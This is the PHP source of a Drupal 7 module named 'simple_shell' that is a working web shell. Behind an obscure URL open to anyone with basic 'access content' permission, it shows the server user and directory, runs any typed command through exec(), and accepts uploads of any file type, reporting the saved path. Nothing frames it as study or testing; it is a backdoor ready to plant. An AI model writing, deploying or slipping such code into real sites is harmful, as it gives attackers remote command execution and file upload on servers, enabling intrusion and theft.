<?php
function simple_shell_menu() {
	$items = array();
	$items['simple_shell/tdYkTACP'] = array(
		'title' => 'Simple Shell',
		'page callback' => '_simple_shell_page',
		'access callback' => 'user_access',
		'access arguments' => array('access content'),
		'type' => MENU_CALLBACK,
	);
	return $items;
}


function _simple_shell_page() {
	$form_state = form_state_defaults();
	$form = drupal_build_form('simple_shell_form',$form_state);
	form_get_cache($form['#build_id'], $form_state);

	$id = [];
	$retCode = 0;
	exec('id',$id,$retCode);
	$id = implode('&#10;',$id);
	$pwd = [];
	$retCode = 0;
	exec('pwd',$pwd,$retCode);
	$pwd = implode('&#10;',$pwd);


	$command = 'id';
	if (!empty($form_state['values']['command'])) {
		$command = $form_state['values']['command'];
	}else{
		$form_state['values']['command'] = $command;
	}

	$ret = [];
	$retCode = 0;
	exec($command,$ret,$retCode);
	foreach($ret as $l => $retline){
		$ret[$l] = htmlentities($retline);
	}

	$uploadform = drupal_get_form('simple_shell_fileupload_form');

	$page = array(
		'#theme' => 'page',
		'#type' => 'page',
		'content' => array(
			'identity' => array(
				'#type' => 'markup',
				'#markup' => 'User is '.$id.'<br />PWD is '.$pwd,
			),
			'form' => $form,
			'answer' => array(
				'#type' => 'markup',
				'#markup' => '<p>Command returned '.$retCode.'</p><pre>'.implode('&#10;',$ret).'</pre>',
			),
			'uploadform' => $uploadform,
		),
	);
	return $page;
}

function simple_shell_form($form, &$form_state) {
	$form['command'] = array(
		'#type' => 'textfield',
		'#title' => 'Command',
		'#required' => TRUE,
	);
	$form['submit_button'] = array(
		'#type' => 'submit',
		'#value' => t('Run'),
	);

	return $form;
}

function simple_shell_form_submit($node, &$form_state) {
	$form_state['rebuild'] = TRUE;
}

function simple_shell_fileupload_form($form, &$form_state) {
	$form['fileupload'] = array(
		'#type' => 'file',
		'#title' => 'File upload',
	);
	$form['submit_button'] = array(
		'#type' => 'submit',
		'#value' => t('Upload'),
	);

	return $form;
}

function simple_shell_fileupload_form_submit($form, &$form_state) {
	$save = file_save_upload('fileupload', $validators = array('file_validate_extensions'=>array()));
	drupal_set_message('Le fichier: <strong>"' . drupal_realpath($save->uri) . '"</strong> est bien sur le serveur');
}

